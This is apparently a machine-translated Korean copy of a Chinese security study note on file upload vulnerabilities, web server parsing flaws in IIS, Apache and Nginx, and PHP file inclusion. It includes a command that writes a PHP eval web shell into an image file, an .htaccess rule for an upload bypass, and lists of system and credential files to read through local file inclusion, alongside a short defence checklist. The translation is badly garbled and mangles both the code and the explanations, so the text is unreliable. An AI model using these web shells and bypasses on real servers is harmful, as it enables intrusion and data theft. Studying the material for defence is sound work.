2019년 11월 11일 : 파일 업로드, 파일 기초, 메모를 포함

; >> x.jpg 에코 "<? PHP @eval ($ _ POST [ 'XXX'])>"엄마 리눅스 명령 하에서 사진을 만들어

× 00은 5.3.4, magic_quotes_gpc의 = 꺼짐보다 적은 업로드 조건 우회, PHP로 절단

업로드 바이 패스의 .htaccess
<FilesMatch "cimer">
SetHandler 파일 응용 프로그램 / httpd 실행에 X-PHP
</ FilesMatch>

파일 업로드하면, 파일을 구문 분석 할 수, 알 업로드 경로 필요가 파일을 업로드 할 수 있습니다,주의 사항을 악용

iis5-6 취약점 구문 분석
스크립트 파일이 정규 파일이 아닙니다 기본적으로 서버 나 미들웨어 파싱하여, 그러나 실제로 구문 분석되는 파일에 숨겨진 악성 코드의 결과로, 해결, 서버를 나타내는 미들웨어 취약점은 IIS를 분석 등장 : asp.asp / 1.JPG 파일 디렉토리 파싱 취약점, xx.asp, .jsp로 파일 이름이 취약점 분석
취약점을 분석 IIS7.5을
그 자체의 nginx 또는 IIS7.5 허점이다 cgi.fix_pathinfo를 열 때문에 PHP 설정 파일에, 취약점 URL은 : www.aa.com/images/1.jpg/1.php
아파치 취약성 분석
xxx.aspx.a을, xxx.asp.jpg..jpg 때문에에게 앞으로 올바른 구문 분석 충족 접미사는 그것을 모른다 이 접미사를 해결할 수있을 때까지,이 취약점 분석하게됩니다 건너 뛸
라인 구성 AddHandler에 응용 프로그램 / x는 - 아파치 - PHP는이 .PHP는, 이 코드 줄은 PHP를 사용하여 파일 접미사가 발생할 수 있기 때문에, 아파치의 conf의 취약점을 분석의 결과를 PHP 스크립트 실행 해결
의 nginx 구문 분석 취약점을
nginx를 <8.03 공자 자매 코드 실행 취약점이 접미사에 존재의 nginx는 PHP와 같은이 파일을 실행할 때 .PHP입니다 a.png / xx.php, cif.fix_pathinfo, 개방, 턴, a.png / xx.php 후, xx.php 다음 구문 분석 a.png 것인가가 xx.php 지워집니다 존재뿐만 아니라 앞으로 구문 분석하지 않습니다, PHP로 a.png 파일을 발견

파일 업로드 취약점 방어
1 파일 업로드 디렉토리가 수행하도록 설정되지 않은
2 파일 타입이 결정되고, 이러한 MIME 결정으로서 검출 방법의 광범위한 다양한 접미사가 검출 된 화이트리스트
(3), 파일 경로 덮어 난수를 사용하여
4, 단일 세트 파일 서버, 엄격한 통제 기관
(5), 2 차 렌더링 이미지
6, 취약점 방어 (업로드 + 플랫폼 구문 분석) 분석을위한 업로드, 설정 cgi.fix_pathinfo, 낮은 버전은 엄격한 통제 파일 필요 IIS를, 더 높은 버전으로 업그레이드 IIS를 등의 업그레이드 버전으로, 아파치 파싱 취약점에 대한 지불의 관심을 정기적 일치 구성 쓰기 파일과 디렉토리를 사용하는 등, 보안 구성, Nginx와는 구성에 fix_pathinfo 취약점 업그레이드 버전 높은 버전에주의를 구문 분석
타사 보호의 사용으로, (7) 도구, D 차폐 / WAF / 실드 클라우드 / 클라우드 잠금

파일에 포함될 취약점의
파일은 클래스, 함수 또는 파일 패키지, 파일이 어떤 필터 또는 필터는 엄격한 파일 취약점을 포함 할 수 없습니다가있는 BAA가 포함되어있는 경우 사용자 친화적 인, 전화 등 참조를 포함, 악성 코드 분석에 포함시킬 수 있습니다
: 악성 코드 형태로 주입하는 선도 주로 파일에 특정 기능 및 적절한 검증없이 도입 도입하여 PHP 조건
(1), 사용자 제어 파라미터, 사용자 제어에 포함 된 파일 이름
서버 2 파일이 어떤 필터를 포함하지 않는, 필터는 엄격한 아니다

PHP 파일 포함하는 함수에 사용
포함 () 함수를
함수는 파일이 파일 경고가 오류가 발생한 경우에만 주어진다에 포함되어있는 경우 () 함수를 포함하는 경우에만 코드의 실행을 포함 할 때 사용하는 경우에는, 하방으로 진행.
include_once 문 () 함수
기능 포함 () 같은 것을 제외하고 동일한 파일을 호출 한 번만 프로그램 호출을 반복 할 때.
요구 () 함수의
차이는 요구 () 및 ()을 포함 할 것을 요구하고 () 에러가 에러 메시지 함수가 출력을 발생하고 스크립트 종료 수행하는 경우. 사용은이 파일만큼 프로그램 실행을 포함하는 경우 즉시 파일을 호출, () 함수를 필요로하며, 프로그램이 함수 호출로 실행되는 경우에만) (포함한다.
require_once를 () 함수
는 함수는 () 같은 요구, 같은 파일에 대한 호출을 반복 할 때, 프로그램은 한 번만 호출하는 것을 제외하고.

기밀 포함하는 파일
서버에 로컬로 참조 (LFI) 포함 로컬 파일, 민감한 정보 누설 (프로필 / 패스워드 파일 / 데이터베이스 파일) getshell, 명령 실행 등의 원인이
타겟 서버로부터 원격 파일을 포함 (RFI)을 공격자가 원격 서버를 포함하는 악성 파일 민감한 정보 유출, getshell, 명령 실행의 원인이됩니다

파일이 악용 포함
묻지 않았다 allow_url_fopen을, 허점 조건, allow_url_include에서 로컬 파일 포함 취약점을하다
, 원격 파일 포함을 llow_url_include을 필요로 allow_url_fopen을 물어하지에 있습니다
에 액세스 할 수 있도록 URL을 인식하면 fopen 래퍼를 활성화 의뢰 한 URL 파일을 허용할지 여부를 allow_url_include를 기본적으로 켜져 URL 오브젝트 파일, 
allow_url_fopen을이 옵션은 기본적으로 꺼져, URL 오브젝트 파일을 포함 할 수있다 켜져하는 URL 파일을 열 수있다
등등 구성 파일 / / passwd에 /, / 등으로, 중요한 문서를 읽고 , / 그림자 / ssh_conf .history를 다른
getshell
트로이 목마 파일이 포함 된 파일을 통해 서버에 직접 기록 (1),이 프로토콜에 필요한
2, 파일 업로드 파일에 포함 된 사진 말 +
서버가 로깅 기능에 설정되어있는 경우 3, 당신은 getshell 수있는 로그 파일을 포함 할 수 있습니다

추천

출처www.cnblogs.com/sym945/p/11839597.html